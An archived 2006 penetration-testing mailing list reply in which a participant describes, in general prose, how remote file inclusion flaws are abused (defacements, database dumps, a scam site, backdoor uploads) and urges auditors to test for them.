Penetration Testing mailing list archives

Re: Remote File Include Vulns (Are you testing for it, are you teaching it)

From: espen () multigeeks com
Date: Mon, 16 Oct 2006 23:37:15 +0200

Quoting Joseph McCray <joe () learnsecurityonline com>:

I've been spending a lot of time googling these php shells (c99/r57 et
al) lately. It appears that people are getting these on servers via
Remote File Include vulnerabilities.

I'm curious how many auditors are 1) testing for this stuff in your
audits. Tons of blog, forum, and wiki packages have these vulns - are
you guys testing for this stuff, and more importantly are you finding it
vuln in your audits?


--
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe () learnsecurityonline com
Web:        https://www.learnsecurityonline.com


Learn Security Online, Inc.

* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access



Hi Joe,

remote file inclusion (RFI) has become a huge problem and security gapthe last couple of years, therefore I believe that this is somethingto be taken seriously. These vulnerabilities are very easy to exploit;I see it being exploited pretty often, usually by script kiddies whosegoal is to deface the site - but often also to dump forum databases etc.

To give you a little example of this, my brother owns a site which wasvulnerable to RFI. Someone exploited this and set up a paypal scamsite. Luckily enough, the web host suspended the page temporarily tolet him clean up the mess.

Also, when the web servers have writeable directories, it is easy forthe attacker to upload different kinds of (malicious?) stuff. Usuallybackdoors, trojans, psybncs/eggdrops etc. As you probably understand,a lot of these boxes are being used for DDoSing purposes etc.

Another thing that's good for the attacker; if safe mode is set to off.

As I've mentioned earlier, I believe this is something to *really*take seriously, especially while performing pen-tests.



Excuse my English.

Regards,
Espen D.


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

Current thread:

Remote File Include Vulns (Are you testing for it, are you teaching it) Joseph McCray (Oct 16)
- Re: Remote File Include Vulns (Are you testing for it, are you teaching it) Tim (Oct 16)
- Re: Remote File Include Vulns (Are you testing for it, are you teaching it) espen (Oct 16)
- Re: Remote File Include Vulns (Are you testing for it, are you teaching it) Gareth Davies (Oct 17)